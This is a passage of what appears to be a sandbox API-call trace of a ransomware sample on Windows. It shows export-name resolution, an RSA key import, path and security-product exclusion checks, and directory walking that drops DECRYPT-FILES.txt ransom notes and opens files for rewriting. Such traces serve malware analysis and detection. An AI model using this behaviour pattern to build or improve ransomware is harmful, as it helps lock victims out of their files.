(lpString="DELETECRITICALSECTION") returned 21 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0092.949] lstrlenA (lpString="DELETEFIBER") returned 11 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0092.949] lstrlenA (lpString="DELETEFILEA") returned 11 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0092.949] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0092.949] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0092.950] lstrlenA (lpString="DELETEFILEW") returned 11 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0092.950] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0092.950] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0092.950] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0092.950] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0092.950] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0092.950] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0092.950] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0092.950] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0092.950] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0092.950] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0092.950] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0092.950] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0092.950] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0092.950] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0092.950] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0092.950] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0092.951] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0092.951] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0092.951] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0092.951] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0092.951] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0092.951] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0092.951] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0092.951] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0092.951] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0092.951] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0092.951] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0092.951] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0092.951] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0092.951] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0092.951] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0092.951] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0092.951] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0092.951] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0092.951] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0092.952] lstrcpyA (in: lpString1=0x355e7c0, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0092.952] lstrcpyW (in: lpString1=0x170000, lpString2="qwertyuiopasdfghjklzxcvbnm1234567890 " | out: lpString1="qwertyuiopasdfghjklzxcvbnm1234567890 ") returned="qwertyuiopasdfghjklzxcvbnm1234567890 " [0092.952] ShutdownBlockReasonCreate (hWnd=0x701c8, pwszReason="n gkpz1h ") returned 1 [0092.952] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.953] VirtualFree (lpAddress=0x170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.953] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.953] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0092.998] ShutdownBlockReasonDestroy (hWnd=0x701c8) returned 1 Thread: id = 70 os_tid = 0xac8 Thread: id = 71 os_tid = 0xad4 Thread: id = 113 os_tid = 0xba0 [0071.067] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0071.068] CryptAcquireContextW (in: phProv=0xf10004, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xf10004*=0x61eb40) returned 1 [0071.069] CryptImportKey (in: hProv=0x61eb40, pbData=0xdb0000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0xf10008 | out: phKey=0xf10008*=0x5f8a98) returned 1 [0071.073] StrStrW (lpFirst="C:\\", lpSrch="\\Program Files") returned 0x0 [0071.073] StrStrW (lpFirst="C:\\", lpSrch=":\\Windows") returned 0x0 [0071.073] StrStrW (lpFirst="C:\\", lpSrch="\\Games\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\All Users") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="AhnLab") returned 0x0 [0071.076] StrStrW (lpFirst="C:\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.076] lstrlenW (lpString="C:\\") returned 3 [0071.076] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.076] wsprintfW (in: param_1=0x3f2f0a4, param_2="%s\\%s" | out: param_1="C:\\\\jkbimi8.tmp") returned 15 [0071.076] CreateFileW (lpFileName="C:\\\\jkbimi8.tmp" (normalized: "c:\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x408 [0071.078] lstrlenW (lpString="C:\\") returned 3 [0071.078] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.078] wsprintfW (in: param_1=0x3f2f0a4, param_2="%s\\%s" | out: param_1="C:\\\\DECRYPT-FILES.txt") returned 21 [0071.078] CreateFileW (lpFileName="C:\\\\DECRYPT-FILES.txt" (normalized: "c:\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0071.078] WriteFile (in: hFile=0x40c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2f0a0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2f0a0*=0x23fc, lpOverlapped=0x0) returned 1 [0071.079] CloseHandle (hObject=0x40c) returned 1 [0071.080] lstrlenW (lpString="C:\\") returned 3 [0071.081] lstrcatW (in: lpString1="C:\\", lpString2="*" | out: lpString1="C:\\*") returned="C:\\*" [0071.081] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5f8ad8 [0071.081] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0071.081] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0071.081] lstrcatW (in: lpString1="$Recycle.Bin", lpString2="\\" | out: lpString1="$Recycle.Bin\\") returned="$Recycle.Bin\\" [0071.081] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Program Files") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch=":\\Windows") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Games\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\All Users") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="AhnLab") returned 0x0 [0071.081] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.081] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0071.081] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.081] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\\\jkbimi8.tmp") returned 28 [0071.081] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\jkbimi8.tmp" (normalized: "c:\\$recycle.bin\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.094] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0071.094] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.094] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\\\DECRYPT-FILES.txt") returned 34 [0071.094] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\DECRYPT-FILES.txt" (normalized: "c:\\$recycle.bin\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.095] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.096] CloseHandle (hObject=0x41c) returned 1 [0071.096] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0071.096] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0071.096] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.096] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.096] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6994860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.096] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.096] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6994860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.096] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.097] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.097] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.097] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.097] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.097] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.097] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.097] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0071.097] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.097] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0071.097] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\$Recycle.Bin\\jkbimi8.tmp") returned="C:\\$Recycle.Bin\\jkbimi8.tmp" [0071.097] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.100] CreateFileW (lpFileName="C:\\$Recycle.Bin\\jkbimi8.tmp" (normalized: "c:\\$recycle.bin\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.101] CloseHandle (hObject=0x0) returned 0 [0071.101] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.101] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0071.101] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0071.101] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0071.101] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0071.101] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.101] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.102] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0071.102] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.102] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0071.102] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.102] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp") returned 75 [0071.102] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.102] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0071.102] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.102] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 81 [0071.102] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.103] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.104] CloseHandle (hObject=0x424) returned 1 [0071.104] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 